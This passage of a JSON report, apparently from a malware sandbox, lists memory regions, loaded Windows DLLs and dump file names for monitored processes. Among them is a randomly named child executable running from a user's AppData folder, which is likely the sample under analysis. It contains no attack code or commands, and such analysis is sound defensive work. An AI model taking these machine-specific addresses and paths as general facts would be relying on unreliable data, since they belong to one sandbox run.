"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1935278080, "type": "region", "version": 1 }, "end_va": 1935310847, "entry_point": 1935278080, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_1107", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1935278080, "timestamp": "00:01:03.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956466687, "entry_point": 1956451807, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_1108", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:03.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1965490176, "type": "region", "version": 1 }, "end_va": 1965514751, "entry_point": 1965495923, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_1109", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1965490176, "timestamp": "00:01:03.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1945763840, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945803022, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_1110", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1945763840, "timestamp": "00:01:03.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 0, "filename": null, "id": "region_1111", "name": "pagefile_0x0000000000540000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5505024, "timestamp": "00:01:03.227", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001112-addr_0x0000000001f40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_1112", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:01:03.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1113", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:01:03.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5574655, "entry_point": 0, "filename": null, "id": "region_1114", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:03.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1871183872, "type": "region", "version": 1 }, "end_va": 1871552511, "entry_point": 1871183872, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_1115", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1871183872, "timestamp": "00:01:03.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967054847, "entry_point": 1967002165, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1116", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:01:03.251", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001117-addr_0x0000000001f80000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 34078719, "entry_point": 0, "filename": null, "id": "region_1117", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:01:03.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1852178432, "type": "region", "version": 1 }, "end_va": 1852211199, "entry_point": 1852178432, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_1118", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1852178432, "timestamp": "00:01:03.261", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001119-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_1119", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:01:03.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1945632768, "type": "region", "version": 1 }, "end_va": 1945706495, "entry_point": 1945645681, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1250", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1945632768, "timestamp": "00:01:03.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1946091520, "type": "region", "version": 1 }, "end_va": 1946144767, "entry_point": 1946099730, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_1251", "name": "dhcpcsvc6.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 1946091520, "timestamp": "00:01:03.457", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001252-addr_0x0000000002080000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 34078720, "type": "region", "version": 1 }, "end_va": 35127295, "entry_point": 0, "filename": null, "id": "region_1252", "name": "private_0x0000000002080000", "norm_filename": null, "region_type": "private_memory", "start_va": 34078720, "timestamp": "00:01:08.181", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001253-addr_0x0000000002180000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 36175871, "entry_point": 0, "filename": null, "id": "region_1253", "name": "private_0x0000000002180000", "norm_filename": null, "region_type": "private_memory", "start_va": 35127296, "timestamp": "00:01:08.181", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001254-addr_0x0000000002280000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_1254", "name": "private_0x0000000002280000", "norm_filename": null, "region_type": "private_memory", "start_va": 36175872, "timestamp": "00:01:08.182", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001255-addr_0x000000007ffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_1255", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:01:08.182", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001256-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_1256", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:01:08.182", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001257-addr_0x000000007ffd7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_1257", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:01:08.182", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe", "id": "proc_8", "image_name": "ekgeobhbhtp7rxmh.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001258-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1258", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:08.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1259", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:08.212", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001260-addr_0x00000000001f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_1260", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:08.212", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001261-addr_0x0000000000c40000-size_0x000000000001b000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 110592, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 12955647, "entry_point": 12845056, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", "id": "region_1261", "name": "ekgeobhbhtp7rxmh.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe", "region_type": "memory_mapped_file", "start_va": 12845056, "timestamp": "00:01:08.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1262", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:01:08.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1263", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:01:08.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1264", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:08.216", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001265-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_1265", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:01:08.216", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001266-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1266", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:08.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1267", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:08.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 684031, "entry_point": 262144, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1268", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:08.234", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001269-addr_0x00000000000d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 917503, "entry_point": 0, "filename": null, "id": "region_1269", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:08.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001270-addr_0x00000000003b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_1270", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:01:08.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1271", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:01:08.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1272", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:01:08.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1273", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:01:08.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1274", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:01:08.237", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1275", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:01:08.237", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1276", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:08.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1277", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:01:08.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1278", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:08.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1279", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:01:08.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1280", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:08.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1281", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:01:08.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1282", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:01:08.241", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1283", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:01:08.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1284", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:08.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1285", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:08.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1286", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:01:08.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1287", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:01:08.244", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1288", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:08.244", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1289", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:08.245", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 